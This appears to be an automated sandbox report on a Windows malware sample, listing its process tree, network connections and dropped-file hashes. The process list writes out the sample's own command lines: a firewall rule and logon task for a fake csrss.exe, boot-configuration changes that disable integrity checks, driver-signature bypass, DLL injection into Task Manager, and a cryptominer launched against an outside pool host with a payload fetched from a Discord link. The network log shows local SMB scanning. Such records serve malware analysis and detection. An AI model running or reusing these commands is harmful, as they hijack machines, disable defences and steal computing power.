"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240307045316.log C:\Windows\Logs\CBS\CbsPersist_20240307045316.cab

C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe

"C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe

C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id c7dcfc48-876d-495c-9c26-800030885822 --tls --nicehash -o showlock.net:443 --rig-id c7dcfc48-876d-495c-9c26-800030885822 --tls --nicehash -o showlock.net:80 --rig-id c7dcfc48-876d-495c-9c26-800030885822 --nicehash --http-port 3433 --http-access-token c7dcfc48-876d-495c-9c26-800030885822 --randomx-wrmsr=-1

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe -hide 320

Network

Country Destination Domain Proto
US 8.8.8.8:53 c7dcfc48-876d-495c-9c26-800030885822.uuid.dumppage.org udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 8.8.8.8:53 server14.dumppage.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.ipfire.org udp
BG 185.82.216.111:443 server14.dumppage.org tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
DE 81.3.27.44:3478 stun.ipfire.org udp
US 8.8.8.8:53 carsalessystem.com udp
US 104.21.94.82:443 carsalessystem.com tcp
BG 185.82.216.111:443 server14.dumppage.org tcp
BG 185.82.216.111:443 server14.dumppage.org tcp
BG 185.82.216.111:443 server14.dumppage.org tcp
N/A 127.0.0.1:31465 tcp
BG 185.82.216.111:443 server14.dumppage.org tcp
BG 185.82.216.111:443 server14.dumppage.org tcp
US 104.21.94.82:443 carsalessystem.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 trythisgid.com udp
CZ 46.8.8.100:443 trythisgid.com tcp
US 8.8.8.8:53 udp
US 199.59.243.225:80 ww82.trythisgid.com tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.52:445 tcp
US 8.8.8.8:53 showlock.net udp
NL 190.2.153.202:40001 showlock.net tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.91:445 tcp
US 8.8.8.8:53 stun.ipfire.org udp
DE 81.3.27.44:3478 stun.ipfire.org udp
US 8.8.8.8:53 snickerfool.com udp
NL 80.79.4.25:80 snickerfool.com tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.135:445 tcp
NL 80.79.4.25:80 snickerfool.com tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.255:445 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.1.0:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.1.24:445 tcp
N/A 10.127.1.22:445 tcp
N/A 10.127.1.15:445 tcp
N/A 10.127.1.16:445 tcp
N/A 10.127.1.27:445 tcp
N/A 10.127.1.48:445 tcp
N/A 10.127.1.5:445 tcp
N/A 10.127.1.2:445 tcp
N/A 10.127.1.39:445 tcp
N/A 10.127.1.26:445 tcp
N/A 10.127.1.49:445 tcp
N/A 10.127.1.53:445 tcp
N/A 10.127.1.12:445 tcp
N/A 10.127.1.40:445 tcp
N/A 10.127.1.58:445 tcp
N/A 10.127.1.1:445 tcp
N/A 10.127.1.30:445 tcp
N/A 10.127.1.45:445 tcp
N/A 10.127.1.57:445 tcp
N/A 10.127.1.8:445 tcp
N/A 10.127.1.43:445 tcp
N/A 10.127.1.23:445 tcp
N/A 10.127.1.34:445 tcp
N/A 10.127.1.46:445 tcp
N/A 10.127.1.29:445 tcp
N/A 10.127.1.44:445 tcp
N/A 10.127.1.63:445 tcp
N/A 10.127.1.20:445 tcp
N/A 10.127.1.28:445 tcp
N/A 10.127.1.7:445 tcp
N/A 10.127.1.56:445 tcp
N/A 10.127.1.9:445 tcp
N/A 10.127.1.54:445 tcp
N/A 10.127.1.47:445 tcp
N/A 10.127.1.62:445 tcp
N/A 10.127.1.33:445 tcp
N/A 10.127.1.25:445 tcp
N/A 10.127.1.31:445 tcp
N/A 10.127.1.55:445 tcp
N/A 10.127.1.3:445 tcp
N/A 10.127.1.4:445 tcp
N/A 10.127.1.35:445 tcp
N/A 10.127.1.41:445 tcp
N/A 10.127.1.60:445 tcp
N/A 10.127.1.51:445 tcp
N/A 10.127.1.36:445 tcp
N/A 10.127.1.11:445 tcp
N/A 10.127.1.18:445 tcp
N/A 10.127.1.6:445 tcp
N/A 10.127.1.13:445 tcp
N/A 10.127.1.19:445 tcp
N/A 10.127.1.64:445 tcp
N/A 10.127.1.61:445 tcp
N/A 10.127.1.32:445 tcp
N/A 10.127.1.17:445 tcp
N/A 10.127.1.37:445 tcp
N/A 10.127.1.52:445 tcp

Files

memory/2384-0-0x00000000038A0000-0x0000000003C98000-memory.dmp

memory/2384-1-0x00000000038A0000-0x0000000003C98000-memory.dmp

memory/2384-2-0x0000000003CA0000-0x000000000458B000-memory.dmp

memory/2384-3-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2604-4-0x00000000036A0000-0x0000000003A98000-memory.dmp

memory/2604-6-0x00000000036A0000-0x0000000003A98000-memory.dmp

memory/2384-8-0x00000000038A0000-0x0000000003C98000-memory.dmp

memory/2604-7-0x0000000003AA0000-0x000000000438B000-memory.dmp

memory/2384-5-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2604-9-0x0000000000400000-0x0000000001E11000-memory.dmp

\Windows\rss\csrss.exe

MD5 ced1f3fc34f2a39270d7db5883fe8a1f
SHA1 2f207b86cbd8397b183c3feb774eb279f0d76263
SHA256 192346281d3b063cf570a32f88571b3f896872b36eecb4bda049ac684d34b227
SHA512 406dc13f017b7a75039c0d49bd821d4cebcc04fa4b455f758eb68819e8f0c72e1a3635afe8cafc3a04a4eb64d026458bb14c49cb4f124fc8f67eac628eb4e252

\Windows\rss\csrss.exe

MD5 0d50ddc52c14259fb37b12c07ea701ee
SHA1 0b0e6794762b271e52bc5a9f88d48762bb49de30
SHA256 9384c9bdfe40941751b78aadd4ca74b9a0179964736a45fc6c2a19c0ddf11f18
SHA512 a3e44008182a89b0f037b0ff06c588a05e13eaae1f962e88c2c272a076a91e033f86fbc271d0f2446b2ddfe5ebca885ac77af3990cd53bf2373a69ed4290a6f1

C:\Windows\rss\csrss.exe

MD5 153ce197b14e4483ecf3188b57c414f0
SHA1 e01fcef3278b6ac4e30024d97fe8fc91ff24be59
SHA256 b475cb7d45dfa2879c8d42b452dc5b1d6c3eaa32e83bd5f4cb11065e0fadae86
SHA512 4668df36ca957863010fee345f8a7403dd3faf072dce637ab502488119fec0b98a4839906954a2c01099983f8dd819109f631a167f8ec21575eb6c9b37280416

memory/2456-19-0x0000000003890000-0x0000000003C88000-memory.dmp

memory/2604-18-0x0000000000400000-0x0000000001E11000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 374a90da1a6547f00f47d1cb5bce6297
SHA1 b38a83b09e4931ff7089b497f2b3676ab537faf8
SHA256 57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f
SHA512 07cb2eb4f98cdf5e09db509186a5b7b18975c4ef000ce7247711bb35f5fc536f70d05420992312926c860123af017a7b2e341a99d74ca1eadfd11397f4ac7705

memory/2456-20-0x0000000003890000-0x0000000003C88000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 9ebc3622c50d655d4a44d52276c1575a
SHA1 e437cb22e12b360e48bd0e116f4f2f684ac55796
SHA256 b3e464d1dcc4a347875011b0a68c5fe0860f3be4a3885d033be4eb340d1563a3
SHA512 0eefdac60c5fc9a97c8655f58c962f9ab9fc0cffa26eb4e74d57360d383eca0af6b7d7b83e227b4863d4cb8547578496a14174cc3e86c360bfa0599d2f7af4f4

memory/2456-22-0x0000000000400000-0x0000000001E11000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 07483f2923c79c176f3e7ce5e2fe2add
SHA1 ef3bfab46fd137e8b780e5a85304b6c2b77e4fa9
SHA256 c53c20a0aa04606588a5630cdcb16d217227c28c7925cbc19cc70f9bf36ef9a6
SHA512 cfd07ed725ad13269cf045026b28de3aa02bbc536d2f4d13176135a037a3863036e006f89e6634760adc536e486d3b15d16d36110d928017f91b2c853503179b

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 86f8ccd3b15245a8d266919f58141563
SHA1 2970c6cb2d6830fe08e91a411dc45285a10c3a6c
SHA256 1c169dcc095f88004aa473f33d35ca42f1db35f4223450ae15ab35cc66528a45
SHA512 563251b004adc03b941bc11cdbea56c9b0427d40056bc12f862b9494efbec73a26d6d5fdf83d3fc68f77422e95013de8a47223cc54fc773748285ccd183cc663

memory/1424-42-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 7ad8463f7747aa35537f3e67de3f19f9
SHA1 cdacdb0e63e812c2b2a7f44a6c90d9c02c27e22f
SHA256 6910b05e1c3c15c85307c76cacd006ae6731dc6790e5803e954dff05c09a44e9
SHA512 721d82b5d655826c9b195d32fd14bab7ddc2e867e8c739946b3fbc15fe97c7ee31ffe3829deeb6de8c9e9001c12d58d1b0a639d3d29de5f403fb33503caec1b3

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 5fa4caf07666241990e01408a97bda20
SHA1 a594b0c51b4b452a7e1183ff414519f4252c581b
SHA256 9e1a5a680f2631d6e6d9722b43a593e3503f45bc5fd47bb8751a5426e021a68b
SHA512 4271f97232e39d7a812de4e51ab0975d451bcf0010b552d8edbf05f9b7f39fb080be97d74500f30401c5a365a1468e5c4a4ab7f6914e81620cf6fafc7fd0fef4

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 6eae804c00d4dab88686f68723f4e905
SHA1 a487f7d1be2abd884fc2cba6b6aeb3e561164949
SHA256 d83a31bd8f0c092cc847be5647ea6cf306166223538cbd509da552e5b6f8823e
SHA512 6f64c300f6aaf928eec592c41712a63b80aa951629b0f4f0d8b3af926e5164c14e37f3dcb6eff7f5d92d97bb98bf6fcefd8190a8e0d6f3ff287759977e029b4f

memory/1424-28-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\Cab27BE.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar293B.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/2456-102-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-114-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-115-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-119-0x0000000000400000-0x0000000001E11000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

memory/2456-147-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-150-0x0000000000400000-0x0000000001E11000-memory.dmp

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
